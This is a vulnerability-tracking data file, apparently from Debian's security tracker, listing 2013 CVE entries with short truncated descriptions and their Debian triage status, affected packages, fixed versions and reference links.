CVE-2013-6981 (Cisco IOS XE 3.7S(.1) and earlier allows remote attackers to cause a d ...)
	NOT-FOR-US: Cisco IOS XE
CVE-2013-6980
	RESERVED
CVE-2013-6979 (The VTY authentication implementation in Cisco IOS XE 03.02.xxSE and 0 ...)
	NOT-FOR-US: Cisco IOS XE
CVE-2013-6978 (The disaster recovery system (DRS) component in Cisco Unified Communic ...)
	NOT-FOR-US: Cisco
CVE-2013-6977
	RESERVED
CVE-2013-6976 (Cross-site request forgery (CSRF) vulnerability in goform/Quick_setup ...)
	NOT-FOR-US: Cisco
CVE-2013-6975 (Directory traversal vulnerability in the command-line interface in Cis ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2013-6974 (Cross-site scripting (XSS) vulnerability in the web interface in Cisco ...)
	NOT-FOR-US: Cisco Secure Access Control System
CVE-2013-6973 (Cisco WebEx Training Center allows remote attackers to discover regist ...)
	NOT-FOR-US: Cisco
CVE-2013-6972 (Cisco WebEx Training Center allows remote attackers to discover sessio ...)
	NOT-FOR-US: Cisco
CVE-2013-6971 (Open redirect vulnerability in Cisco WebEx Training Center allows remo ...)
	NOT-FOR-US: Cisco
CVE-2013-6970 (Cisco WebEx Meeting Center allows remote attackers to obtain sensitive ...)
	NOT-FOR-US: Cisco
CVE-2013-6969 (The training-registration page in Cisco WebEx Training Center allows r ...)
	NOT-FOR-US: Cisco
CVE-2013-6968 (Cisco WebEx Training Center provides different error messages for regi ...)
	NOT-FOR-US: Cisco
CVE-2013-6967 (Open redirect vulnerability in the mobile-browser subsystem in Cisco W ...)
	NOT-FOR-US: Cisco
CVE-2013-6966 (Open redirect vulnerability in Cisco WebEx Training Center allows remo ...)
	NOT-FOR-US: Cisco
CVE-2013-6965 (The registration component in Cisco WebEx Training Center provides the ...)
	NOT-FOR-US: Cisco
CVE-2013-6964 (Cisco WebEx Meeting Center allows remote authenticated users to bypass ...)
	NOT-FOR-US: Cisco
CVE-2013-6963 (Cross-site scripting (XSS) vulnerability in the registration component ...)
	NOT-FOR-US: Cisco
CVE-2013-6962 (Cross-site scripting (XSS) vulnerability in the mobile-browser subsyst ...)
	NOT-FOR-US: Cisco
CVE-2013-6961 (Cross-site scripting (XSS) vulnerability in the Collaboration Partner ...)
	NOT-FOR-US: Cisco
CVE-2013-6960 (Multiple cross-site scripting (XSS) vulnerabilities in Cisco WebEx Mee ...)
	NOT-FOR-US: Cisco
CVE-2013-6959 (Open redirect vulnerability in Cisco WebEx Sales Center allows remote ...)
	NOT-FOR-US: Cisco
CVE-2013-6958 (Juniper NetScreen Firewall running ScreenOS 5.4, 6.2, or 6.3, when the ...)
	NOT-FOR-US: Juniper NetScreen Firewall
CVE-2013-6957 (Cross-site scripting (XSS) vulnerability in the web administrative com ...)
	NOT-FOR-US: Juniper
CVE-2013-6956 (Cross-site scripting (XSS) vulnerability in the Secure Access Service ...)
	NOT-FOR-US: Juniper Junos Pulse Secure Access Service
CVE-2013-6955 (webman/imageSelector.cgi in Synology DiskStation Manager (DSM) 4.0 bef ...)
	NOT-FOR-US: Synology DiskStation Manager
CVE-2013-6954 (The png_do_expand_palette function in libpng before 1.6.8 allows remot ...)
	{DSA-2923-1}
	- libpng (Vulnerable code introduced in 1.6.1)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1045561
	NOTE: http://sourceforge.net/mailarchive/message.php?msg_id=31751422
CVE-2013-6953 (BlogEngine.NET 2.8.0.0 and earlier allows remote attackers to read use ...)
	NOT-FOR-US: BlogEngine.NET
CVE-2013-6952 (The Belkin WeMo Home Automation firmware before 3949 has a hardcoded G ...)
	NOT-FOR-US: Belkin WeMo
CVE-2013-6951 (The Belkin WeMo Home Automation firmware before 3949 does not maintain ...)
	NOT-FOR-US: Belkin WeMo
CVE-2013-6950 (The Belkin WeMo Home Automation firmware before 3949 does not use SSL ...)
	NOT-FOR-US: Belkin WeMo
CVE-2013-6949 (The Belkin WeMo Home Automation firmware before 3949 does not properly ...)
	NOT-FOR-US: Belkin WeMo
CVE-2013-6948 (The peerAddresses API in the Belkin WeMo Home Automation firmware befo ...)
	NOT-FOR-US: Belkin WeMo
CVE-2013-6947
	RESERVED
CVE-2013-6946
	RESERVED
CVE-2013-6945 (The M2M Broker in OSEHRA VistA, as distributed before September 30, 20 ...)
	- vista (bug #541242)
CVE-2013-6944 (Cross-site scripting (XSS) vulnerability in the user interface in the ...)
	NOT-FOR-US: Citrix NetScaler Application Delivery Controller
CVE-2013-6943 (Citrix NetScaler Application Delivery Controller (ADC) 9.3.x before 9. ...)
	NOT-FOR-US: Citrix NetScaler Application Delivery Controller
CVE-2013-6942 (Cross-site request forgery (CSRF) vulnerability in Citrix NetScaler Ap ...)
	NOT-FOR-US: Citrix NetScaler Application Delivery Controller
CVE-2013-6941 (Unspecified vulnerability in Citrix NetScaler Application Delivery Con ...)
	NOT-FOR-US: Citrix NetScaler Application Delivery Controller
CVE-2013-6940 (Citrix NetScaler Application Delivery Controller (ADC) 9.3.x before 9. ...)
	NOT-FOR-US: Citrix NetScaler Application Delivery Controller
CVE-2013-6939 (Unspecified vulnerability in Citrix NetScaler Application Delivery Con ...)
	NOT-FOR-US: Citrix NetScaler Application Delivery Controller
CVE-2013-6938 (Unspecified vulnerability in the Service VM in Citrix NetScaler SDX 9. ...)
	NOT-FOR-US: Citrix NetScaler SDX
CVE-2013-6937 (Buffer overflow in VideoCharge Software Watermark Master 2.2.23 allows ...)
	NOT-FOR-US: VideoCharge
CVE-2013-6936 (Multiple SQL injection vulnerabilities in ajaxfs.php in the Ajax forum ...)
	NOT-FOR-US: MyBB (aka MyBulletinBoard)
CVE-2013-6935 (Buffer overflow in VideoCharge Software Watermark Master 2.2.23 allows ...)
	NOT-FOR-US: VideoCharge
CVE-2013-6934 (The parseRTSPRequestString function in Live Networks Live555 Streaming ...)
	- liblivemedia (incomplete patch never applied)
	- vlc (never built against liblivemedia with incomplete patch)
	- mplayer (never built against liblivemedia with incomplete patch)
	- mplayer2 (b-d's on liblivemedia but doesn't actually build the support for it)
CVE-2013-6933 (The parseRTSPRequestString function in Live Networks Live555 Streaming ...)
	{DSA-3156-1}
	- liblivemedia 2014.01.13-1
	[squeeze] - liblivemedia (vuln. code introduced in 2011.08.13)
	- vlc 2.1.4-1
	[wheezy] - vlc 2.0.3-5+deb7u2
	[squeeze] - vlc (not built against vuln. liblivemedia)
	- mplayer 2:1.1.1+svn37434-1 (low)
	[squeeze] - mplayer (Minor issue)
	- mplayer2 (b-d's on liblivemedia but doesn't actually build the support for it)
	NOTE: vlc fixed by binNMU 2.1.2-2+b1, but since binNMUs are not visible to the security tracker, the subsequent sid upload is tracked
	NOTE: for wheezy the version present at release of DSA 3156 is used (2.0.3-5+deb7u2), although strictly speaking it's 2.0.3-5+deb7u2+b1
CVE-2013-6932 (Buffer overflow in IrfanView before 4.37, when a multibyte-character d ...)
	NOT-FOR-US: IrfanView
CVE-2013-6931 (SQL injection vulnerability in the API in Cybozu Garoon 3.7.x before 3 ...)
	NOT-FOR-US: Cybozu Garoon
CVE-2013-6930 (SQL injection vulnerability in the page-navigation implementation in C ...)
	NOT-FOR-US: Cybozu Garoon
CVE-2013-6929 (SQL injection vulnerability in Cybozu Garoon 3.7 SP2 and earlier allow ...)
	NOT-FOR-US: Cybozu Garoon
CVE-2013-6928
	RESERVED
CVE-2013-6927 (Internet TRiLOGI Server (unknown versions) could allow a local user to ...)
	NOT-FOR-US: Internet TRiLOGI Server
CVE-2013-6926 (The integrated HTTPS server in Siemens RuggedCom ROS before 3.12.2 all ...)
	NOT-FOR-US: Siemens
CVE-2013-6925 (The integrated HTTPS server in Siemens RuggedCom ROS before 3.12.2 all ...)
	NOT-FOR-US: Siemens
CVE-2013-6924 (Seagate BlackArmor NAS devices with firmware sg2000-2000.1331 allow re ...)
	NOT-FOR-US: Seagate BlackArmor NAS devices
CVE-2013-6923 (Multiple cross-site scripting (XSS) vulnerabilities in Seagate BlackAr ...)
	NOT-FOR-US: Seagate BlackArmor NAS 220 devices
CVE-2013-6922 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Seag ...)
	NOT-FOR-US: Seagate BlackArmor NAS 220
CVE-2013-6921
	RESERVED
CVE-2013-6985 (SQL injection vulnerability in m_worklog/log_searchday.jsp in Enorth W ...)
	NOT-FOR-US: Enorth Webpublisher CMS
CVE-2013-6920 (Siemens SINAMICS S/G controllers with firmware before 4.6.11 do not re ...)
NOT-FOR-US: Siemens CVE-2013-6919 (The default configuration of phpThumb before 1.7.12 has a false value ...) NOT-FOR-US: phpThumb CVE-2013-6917 RESERVED CVE-2013-6916 (Cross-site scripting (XSS) vulnerability in the Yahoo! User Interface ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6915 (Cross-site scripting (XSS) vulnerability in the system-administration ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6914 (Cross-site scripting (XSS) vulnerability in a calendar component in Cy ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6913 (Cross-site scripting (XSS) vulnerability in a search component in Cybo ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6912 (Cross-site scripting (XSS) vulnerability in a calendar component in Cy ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6911 (Cross-site scripting (XSS) vulnerability in the bulletin-board compone ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6910 (Cross-site scripting (XSS) vulnerability in Ajax components in Cybozu ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6909 (Cross-site scripting (XSS) vulnerability in a report component in Cybo ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6908 (Cross-site scripting (XSS) vulnerability in a mail component in Cybozu ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6907 (Cross-site scripting (XSS) vulnerability in a mail component in Cybozu ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6906 (Cross-site scripting (XSS) vulnerability in a mail component in Cybozu ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6905 (Cross-site scripting (XSS) vulnerability in a phone component in Cyboz ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6904 (Cross-site scripting (XSS) vulnerability in a note component in Cybozu ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6903 (Cross-site scripting (XSS) vulnerability in a schedule component in Cy ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6902 (Cross-site scripting (XSS) vulnerability in the Space function in Cybo ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6901 (Cross-site scripting (XSS) vulnerability in the Space function in Cybo ...) 
NOT-FOR-US: Cybozu Garoon CVE-2013-6900 (Cross-site scripting (XSS) vulnerability in the system-administration ...) NOT-FOR-US: Cybozu Garoon CVE-2013-6918 (The web interface on the Satechi travel router 1.5, when Wi-Fi is used ...) NOT-FOR-US: Satechi travel router CVE-2013-6899 RESERVED CVE-2013-6898 RESERVED CVE-2013-6897 RESERVED CVE-2013-6896 RESERVED CVE-2013-6895 RESERVED CVE-2013-6894 RESERVED CVE-2013-6893 RESERVED CVE-2013-6892 (WebSVN 2.3.3 allows remote authenticated users to read arbitrary files ...) {DSA-3137-1 DLA-136-1} - websvn 2.3.3-1.2 (bug #775682) CVE-2013-6891 (lppasswd in CUPS before 1.7.1, when running with setuid privileges, al ...) - cups 1.7.1-1 [wheezy] - cups (Vulnerable code introduced with 1.6.4) [squeeze] - cups (Vulnerable code introduced with 1.6.4) NOTE: https://www.cups.org/str.php?L4319 CVE-2013-6890 (denyhosts 2.6 uses an incorrect regular expression when analyzing auth ...) {DSA-2826-1} - denyhosts 2.6-10.1 CVE-2013-6889 (GNU Rush 1.7 does not properly drop privileges, which allows local use ...) - rush 1.7+dfsg-4 (bug #733505) [wheezy] - rush 1.7+dfsg-1+deb7u1 CVE-2013-6888 (Uscan in devscripts before 2.13.9 allows remote attackers to execute a ...) {DSA-2836-1} - devscripts 2.13.9 [squeeze] - devscripts (Minor issue) CVE-2013-6887 (OpenJPEG 1.5.1 allows remote attackers to cause a denial of service vi ...) - openjpeg 1.5.2-1 (bug #731237) [wheezy] - openjpeg (Only affects 1.5) [squeeze] - openjpeg (Only affects 1.5) CVE-2013-6886 (RealVNC VNC 5.0.6 on Mac OS X, Linux, and UNIX allows local users to g ...) - vnc4 (Only affects 5.0.6, binaries in Debian version are not setuid root) CVE-2013-6884 (The write-blocker in CRU Ditto Forensic FieldStation with firmware bef ...) NOT-FOR-US: Ditto Forensic FieldStation CVE-2013-6883 (Cross-site request forgery (CSRF) vulnerability in CRU Ditto Forensic ...) NOT-FOR-US: Ditto Forensic FieldStation CVE-2013-6882 (Multiple cross-site scripting (XSS) vulnerabilities in CRU Ditto Foren ...) 
NOT-FOR-US: Ditto Forensic FieldStation CVE-2013-6881 (CRU Ditto Forensic FieldStation with firmware before 2013Oct15a allows ...) NOT-FOR-US: Ditto Forensic FieldStation CVE-2013-6880 (Open redirect in proxy.php in FlashCanvas before 1.6 allows remote att ...) NOT-FOR-US: FlashCanvas CVE-2013-6879 (The Mijosoft MijoSearch component 2.0.1 and earlier for Joomla! allows ...) NOT-FOR-US: MijoSearch CVE-2013-6878 (Cross-site scripting (XSS) vulnerability in the Mijosoft MijoSearch co ...) NOT-FOR-US: MijoSearch CVE-2013-6877 (Heap-based buffer overflow in RealNetworks RealPlayer before 17.0.4.61 ...) NOT-FOR-US: RealPlayer CVE-2013-6876 (The (1) pty_init_terminal and (2) pipe_init_terminal functions in main ...) - s3d 0.2.2-9 (unimportant) NOTE: http://hmarco.org/bugs/s3dvt_0.2.2-root-shell.html NOTE: Not running with elevated privileges in Debian packaging CVE-2013-6875 (SQL injection vulnerability in functions/prepend_adm.php in Nagios Cor ...) NOT-FOR-US: Nagios XI CVE-2013-6874 (Stack-based buffer overflow in Vortex Light Alloy before 4.7.4 allows ...) NOT-FOR-US: Vortex Light Alloy CVE-2013-6873 (SQL injection vulnerability in Testa Online Test Management System (OT ...) NOT-FOR-US: Testa Online Test Management System CVE-2013-6872 (SQL injection vulnerability in managetimetracker.php in Collabtive bef ...) - collabtive 1.2-1 (low) [wheezy] - collabtive (Minor issue) CVE-2013-6871 RESERVED CVE-2013-6870 (Cross-site scripting (XSS) vulnerability in Splunk Web in Splunk befor ...) NOT-FOR-US: Splunk Web CVE-2013-6885 (The microcode on AMD 16h 00h through 0Fh processors does not properly ...) 
{DSA-3128-1 DLA-155-1} - linux 3.14.2-1 - linux-2.6 NOTE: https://lkml.org/lkml/2014/1/14/198 NOTE: Linux commit: https://git.kernel.org/cgit/linux/kernel/git/tip/tip.git/commit/?id=3b56496865f9f7d9bcb2f93b44c63f274f08e3b6 (v3.14-rc1) NOTE: Might also be fixed in amd64-microcode, but details are not published (https://packages.qa.debian.org/a/amd64-microcode/news/20141218T224849Z.html) NOTE: and since this is fixed on the kernel-side, only track the kernel packages CVE-2013-6857 RESERVED CVE-2013-6856 RESERVED CVE-2013-6855 RESERVED CVE-2013-6854 RESERVED CVE-2013-6853 (Cross-site scripting (XSS) vulnerability in clickstream.js in Y! Toolb ...) NOT-FOR-US: Y! Toolbar plugin CVE-2013-6852 (Cross-site request forgery (CSRF) vulnerability in html/json.html on H ...) NOT-FOR-US: Hewlett-Packard network equipment CVE-2013-6851 RESERVED CVE-2013-6850 RESERVED CVE-2013-6849 RESERVED CVE-2013-6848 RESERVED CVE-2013-6847 RESERVED CVE-2013-6846 RESERVED CVE-2013-6845 RESERVED CVE-2013-6844 RESERVED CVE-2013-6843 RESERVED CVE-2013-6842 RESERVED CVE-2013-6841 RESERVED CVE-2013-6840 (Siemens COMOS before 9.2.0.8.1, 10.0 before 10.0.3.1.40, and 10.1 befo ...) NOT-FOR-US: Siemens COMOS CVE-2013-6839 (SQL injection vulnerability in InstantSoft InstantCMS 1.10.3 and earli ...) NOT-FOR-US: InstantCMS CVE-2013-6838 (An unspecified Enghouse Interactive Professional Services "addon produ ...) NOT-FOR-US: IVR Pro/Contact Center (VIP2000) CVE-2013-6837 (Cross-site scripting (XSS) vulnerability in the setTimeout function in ...) - web2py (unimportant) NOTE: python-web2py contains /usr/share/web2py/applications/examples/static/js/jquery.prettyPhoto.js NOTE: Only an example code CVE-2013-6836 (Heap-based buffer overflow in the ms_escher_get_data function in plugi ...) 
- gnumeric 1.12.9-1 (low) [wheezy] - gnumeric (Minor issue) [squeeze] - gnumeric (Minor issue) NOTE: https://projects.gnome.org/gnumeric/announcements/1.12/gnumeric-1.12.9.shtml NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=712772 CVE-2013-6835 (TelephonyUI Framework in Apple iOS 7 before 7.1, when Safari is used, ...) NOT-FOR-US: iOS CVE-2013-6834 (The ql_eioctl function in sys/dev/qlxgbe/ql_ioctl.c in the kernel in F ...) - kfreebsd-9 (Only affects 10.x) - kfreebsd-8 (Only affects 10.x) - kfreebsd-10 10.0~svn258623-1 (bug #730519) CVE-2013-6833 (The qls_eioctl function in sys/dev/qlxge/qls_ioctl.c in the kernel in ...) - kfreebsd-9 (Only affects 10.x) - kfreebsd-8 (Only affects 10.x) - kfreebsd-10 10.0~svn258623-1 (bug #730519) CVE-2013-6832 (The nand_ioctl function in sys/dev/nand/nand_geom.c in the nand driver ...) - kfreebsd-9 (Only affects 10.x) - kfreebsd-8 (Only affects 10.x) - kfreebsd-10 10.0~svn258623-1 (bug #730518) CVE-2013-6831 (PineApp Mail-SeCure 3.70 and earlier on 5099SK and earlier platforms h ...) NOT-FOR-US: PineApp Mail-SeCure CVE-2013-6830 (admin/confnetworking.html in PineApp Mail-SeCure 3.70 and earlier on 5 ...) NOT-FOR-US: PineApp Mail-SeCure CVE-2013-6829 (admin/confnetworking.html in PineApp Mail-SeCure allows remote attacke ...) NOT-FOR-US: PineApp Mail-SeCure CVE-2013-6828 (admin/management.html in PineApp Mail-SeCure allows remote attackers t ...) NOT-FOR-US: PineApp Mail-SeCure CVE-2013-6827 (Absolute path traversal vulnerability in admin/viewmsg.php in PineApp ...) NOT-FOR-US: PineApp Mail-SeCure CVE-2013-6826 (cgi-bin/module//sysmanager/admin/SYSAdminUserDialog in Fortinet FortiA ...) NOT-FOR-US: Fortinet FortiAnalyzer CVE-2013-6825 ((1) movescu.cc and (2) storescp.cc in dcmnet/apps/, (3) dcmnet/libsrc/ ...) 
	- dcmtk 3.6.1~20150629-1 (unimportant)
	NOTE: http://hmarco.org/bugs/dcmtk-3.6.1-privilege-escalation.html
	NOTE: Not running with elevated privileges in Debian packaging
	NOTE: http://git.dcmtk.org/web?p=dcmtk.git;a=commitdiff;h=beaf5a5c24101daeeafa48c375120b16197c9e95;hp=5349794c4c458c76609b7aeb53d0ca28cf9fe9f0
CVE-2013-6824 (Zabbix before 1.8.19rc1, 2.0 before 2.0.10rc1, and 2.2 before 2.2.1rc1 ...)
	- zabbix 1:2.2.0+dfsg-6 (low)
	[squeeze] - zabbix (Minor issue)
	[wheezy] - zabbix (Minor issue)
	NOTE: https://support.zabbix.com/browse/ZBX-7479
CVE-2013-6823 (GRMGApp in SAP NetWeaver allows remote attackers to bypass intended ac ...)
	NOT-FOR-US: SAP
CVE-2013-6822 (GRMGApp in SAP NetWeaver allows remote attackers to have unspecified i ...)
	NOT-FOR-US: SAP
CVE-2013-6821 (Directory traversal vulnerability in the Exportability Check Service i ...)
	NOT-FOR-US: SAP
CVE-2013-6820 (Unrestricted file upload vulnerability in the SAP NetWeaver Developmen ...)
	NOT-FOR-US: SAP
CVE-2013-6819 (Cross-site scripting (XSS) vulnerability in Performance Provider in SA ...)
	NOT-FOR-US: SAP
CVE-2013-6818 (SAP NetWeaver Logviewer 6.30, when running on Windows, allows remote a ...)
	NOT-FOR-US: SAP
CVE-2013-6817 (Heap-based buffer overflow in SAP Network Interface Router (SAProuter) ...)
	NOT-FOR-US: SAP
CVE-2013-6816 (Multiple cross-site scripting (XSS) vulnerabilities in the (1) JavaDum ...)
	NOT-FOR-US: SAP
CVE-2013-6815 (The SHSTI_UPLOAD_XML function in the Application Server for ABAP (AS A ...)
	NOT-FOR-US: SAP
CVE-2013-6814 (The J2EE Engine in SAP NetWeaver 6.40, 7.02, and earlier allows remote ...)
	NOT-FOR-US: SAP
CVE-2013-6813 RESERVED
CVE-2013-6812 (The ONEDC app before 1.7 for iOS does not properly verify X.509 certif ...)
	NOT-FOR-US: ONEDC app
CVE-2013-6811 (Multiple cross-site request forgery (CSRF) vulnerabilities in the D-Li ...)
	NOT-FOR-US: D-Link
CVE-2013-6810 (The server in Brocade Network Advisor before 12.1.0, as used in EMC Co ...)
	NOT-FOR-US: EMC Connectrix Manager Converged Network Edition
CVE-2013-6809 (Format string vulnerability in the client in Tftpd32 before 4.50 allow ...)
	NOT-FOR-US: Tftpd32
CVE-2013-6808 (Cross-site scripting (XSS) vulnerability in lib/NSSDropoff.php in Zend ...)
	NOT-FOR-US: ZendTo
CVE-2013-6869 (SQL injection vulnerability in the SRTT_GET_COUNT_BEFORE_KEY_RFC funct ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2013-6868 (SAP Sybase Adaptive Server Enterprise (ASE) 15.0.3 before 15.0.3 ESD#4 ...)
	NOT-FOR-US: SAP Sybase Adaptive Server Enterprise
CVE-2013-6867 (Unspecified vulnerability in SAP Sybase Adaptive Server Enterprise (AS ...)
	NOT-FOR-US: SAP Sybase Adaptive Server Enterprise
CVE-2013-6866 (SAP Sybase Adaptive Server Enterprise (ASE) before 15.0.3 ESD#4.3, 15. ...)
	NOT-FOR-US: SAP Sybase Adaptive Server Enterprise
CVE-2013-6865 (SAP Sybase Adaptive Server Enterprise (ASE) 15.0.3 before 15.0.3 ESD#4 ...)
	NOT-FOR-US: SAP Sybase Adaptive Server Enterprise
CVE-2013-6864 (Directory traversal vulnerability in SAP Sybase Adaptive Server Enterp ...)
	NOT-FOR-US: SAP Sybase Adaptive Server Enterprise
CVE-2013-6863 (SAP Sybase Adaptive Server Enterprise (ASE) 15.0.3 before 15.0.3 ESD#4 ...)
	NOT-FOR-US: SAP Sybase Adaptive Server Enterprise
CVE-2013-6862 (Unspecified vulnerability in SAP Sybase Adaptive Server Enterprise (AS ...)
	NOT-FOR-US: SAP Sybase Adaptive Server Enterprise
CVE-2013-6861 (Unspecified vulnerability in SAP Sybase Adaptive Server Enterprise (AS ...)
	NOT-FOR-US: SAP Sybase Adaptive Server Enterprise
CVE-2013-6860 (Unspecified vulnerability in SAP Sybase Adaptive Server Enterprise (AS ...)
	NOT-FOR-US: SAP Sybase Adaptive Server Enterprise
CVE-2013-6859 (SAP Sybase Adaptive Server Enterprise (ASE) before 15.0.3 ESD#4.3. 15. ...)
	NOT-FOR-US: SAP Sybase Adaptive Server Enterprise
CVE-2013-6858 (Multiple cross-site scripting (XSS) vulnerabilities in OpenStack Dashb ...)
	- horizon 2013.2-2 (bug #730752)
	[wheezy] - horizon (Vulnerable code not present)
	NOTE: https://github.com/openstack/horizon/commit/6179f70290783e55b10bbd4b3b7ee74db3f8ef70
CVE-2013-6807 (The client in OpenText Exceed OnDemand (EoD) 8 supports anonymous ciph ...)
	NOT-FOR-US: OpenText Exceed OnDemand
CVE-2013-6806 (OpenText Exceed OnDemand (EoD) 8 allows man-in-the-middle attackers to ...)
	NOT-FOR-US: OpenText Exceed OnDemand
CVE-2013-6805 (OpenText Exceed OnDemand (EoD) 8 uses weak encryption for passwords, w ...)
	NOT-FOR-US: OpenText Exceed OnDemand
CVE-2013-6804 (Cross-site scripting (XSS) vulnerability in the Search module before 1 ...)
	NOT-FOR-US: Jamroom Search module
CVE-2013-6803 RESERVED
CVE-2013-6802 (Google Chrome before 31.0.1650.57 allows remote attackers to bypass in ...)
	{DSA-2799-1}
	- chromium-browser 31.0.1650.57-1
	[squeeze] - chromium-browser
CVE-2013-6801 (Microsoft Word 2003 SP2 and SP3 on Windows XP SP3 allows remote attack ...)
	NOT-FOR-US: Microsoft
CVE-2013-6800 (An unspecified third-party database module for the Key Distribution Ce ...)
	NOTE: Pointless split from CVE-2013-1418
CVE-2013-6799 (Apple Mac OS X 10.9 allows local users to cause a denial of service (m ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2013-6798 (BlackBerry Link before 1.2.1.31 on Windows and before 1.1.1 build 39 o ...)
	NOT-FOR-US: BlackBerry Link
CVE-2013-6797 (Cross-site request forgery (CSRF) vulnerability in bluewrench-video-wi ...)
	NOT-FOR-US: WordPress plugin
CVE-2013-6796 (The SMTP server in DeepOfix 3.3 and earlier allows remote attackers to ...)
	NOT-FOR-US: DeepOfix
CVE-2013-6795 (The Updater in Rackspace Openstack Windows Guest Agent for XenServer b ...)
	NOT-FOR-US: Rackspace Windows Agent and Updater
CVE-2013-6794 (Cross-site scripting (XSS) vulnerability in the Calendar module in Ola ...)
	NOT-FOR-US: Olat
CVE-2013-6793 (Multiple cross-site scripting (XSS) vulnerabilities in the Calendar mo ...)
	NOT-FOR-US: Olat
CVE-2013-6792 (Google Android prior to 4.4 has an APK Signature Security Bypass Vulne ...)
	NOT-FOR-US: Android
CVE-2013-6791 (Microsoft Enhanced Mitigation Experience Toolkit (EMET) before 4.0 use ...)
	NOT-FOR-US: Microsoft Enhanced Mitigation Experience Toolkit
CVE-2013-6790 RESERVED
CVE-2013-6789 (security/MemberLoginForm.php in SilverStripe 3.0.3 supports credential ...)
	- silverstripe (bug #528461)
CVE-2013-6788 (The Bitrix e-Store module before 14.0.1 for Bitrix Site Manager uses s ...)
	NOT-FOR-US: Bitrix Site Manager
CVE-2013-6787 (SQL injection vulnerability in the check_user_password function in mai ...)
	NOT-FOR-US: Chamilo LMS
CVE-2013-6786 (Cross-site scripting (XSS) vulnerability in Allegro RomPager before 4. ...)
	NOT-FOR-US: Allegro RomPager
CVE-2013-6785 (Directory traversal vulnerability in url_redirect.cgi in Supermicro IP ...)
	NOT-FOR-US: Supermicro IPMI
CVE-2013-6784 RESERVED
CVE-2013-6783 RESERVED
CVE-2013-6782 RESERVED
CVE-2013-6781 RESERVED
CVE-2013-6780 (Cross-site scripting (XSS) vulnerability in uploader.swf in the Upload ...)
	- yui (low; bug #730104)
	[squeeze] - yui (Not backportable, doesn't build from source in oldstable/stable)
	[wheezy] - yui (Not backportable, doesn't build from source in oldstable/stable)
	- yui3
	- moodle 2.5.3-1
	[squeeze] - moodle (Unsupported in squeeze-lts)
CVE-2013-6779 RESERVED
CVE-2013-6778 RESERVED
CVE-2013-6777 RESERVED
CVE-2013-6776 RESERVED
CVE-2013-6775 (The Chainfire SuperSU package before 1.69 for Android allows attackers ...)
	NOT-FOR-US: Chainfire SuperSU package
CVE-2013-6774 (Untrusted search path vulnerability in the ChainsDD Superuser package ...)
	NOT-FOR-US: ChainsDD Superuser package
CVE-2013-6773 (Splunk 5.0.3 has an Unquoted Service Path in Windows for Universal For ...)
	NOT-FOR-US: Splunk
CVE-2013-6772 (Splunk before 5.0.4 lacks X-Frame-Options which can allow Clickjacking ...)
	NOT-FOR-US: Splunk
CVE-2013-6771 (Directory traversal vulnerability in the collect script in Splunk befo ...)
	NOT-FOR-US: Splunk
CVE-2013-6770 (The CyanogenMod/ClockWorkMod/Koush Superuser package 1.0.2.1 for Andro ...)
	NOT-FOR-US: CyanogenMod/ClockWorkMod/Koush
CVE-2013-6769 (The CyanogenMod/ClockWorkMod/Koush Superuser package 1.0.2.1 for Andro ...)
	NOT-FOR-US: CyanogenMod/ClockWorkMod/Koush
CVE-2013-6768 (Untrusted search path vulnerability in the CyanogenMod/ClockWorkMod/Ko ...)
	NOT-FOR-US: CyanogenMod/ClockWorkMod/Koush
CVE-2013-6767 (Stack-based buffer overflow in pepoly.dll in Quick Heal AntiVirus Pro ...)
	NOT-FOR-US: QuickHeal AntiVirus
CVE-2013-6764 REJECTED
CVE-2013-6763 (The uio_mmap_physical function in drivers/uio/uio.c in the Linux kerne ...)
	NOTE: Red Hat considers this a non-issue:
	NOTE: http://seclists.org/oss-sec/2013/q4/282
CVE-2013-6762 REJECTED
CVE-2013-6761 REJECTED
CVE-2013-6760 REJECTED
CVE-2013-6759 REJECTED
CVE-2013-6758 REJECTED
CVE-2013-6757 REJECTED
CVE-2013-6756 REJECTED
CVE-2013-6755 REJECTED
CVE-2013-6754 REJECTED
CVE-2013-6753 REJECTED
CVE-2013-6752 REJECTED
CVE-2013-6751 REJECTED
CVE-2013-6750 RESERVED
CVE-2013-6749 (Buffer overflow in the ActiveX control in qp2.cab in IBM Lotus Quickr ...)
	NOT-FOR-US: IBM Lotus Quickr
CVE-2013-6748 (Buffer overflow in the ActiveX control in qp2.cab in IBM Lotus Quickr ...)
	NOT-FOR-US: IBM Lotus Quickr
CVE-2013-6747 (IBM GSKit 7.x before 7.0.4.48 and 8.x before 8.0.50.16, as used in IBM ...)
	NOT-FOR-US: IBM GSKit
CVE-2013-6746 (Cross-site scripting (XSS) vulnerability in FileNet P8 Platform Docume ...)
	NOT-FOR-US: IBM FileNet Business Process Manager
CVE-2013-6745 (Cross-site scripting (XSS) vulnerability in the IMS server before Ifix ...)
	NOT-FOR-US: IBM
CVE-2013-6744 (The Stored Procedure infrastructure in IBM DB2 9.5, 9.7 before FP9, 1 ...)
	NOT-FOR-US: IBM DB2
CVE-2013-6743 (Cross-site scripting (XSS) vulnerability in the Meeting Server in IBM ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-6742 (The Meeting Server in IBM Sametime 8.5.2 through 8.5.2.1 and 9.x throu ...)
	NOT-FOR-US: IBM Sametime
CVE-2013-6741 (IBM Maximo Asset Management 7.x before 7.1.1.7 LAFIX.20140319-0837 and ...)
	NOT-FOR-US: IBM Maximo Asset Management and others
CVE-2013-6740 RESERVED
CVE-2013-6739 (IBM SPSS Modeler before 16 on UNIX allows remote authenticated users t ...)
	NOT-FOR-US: IBM
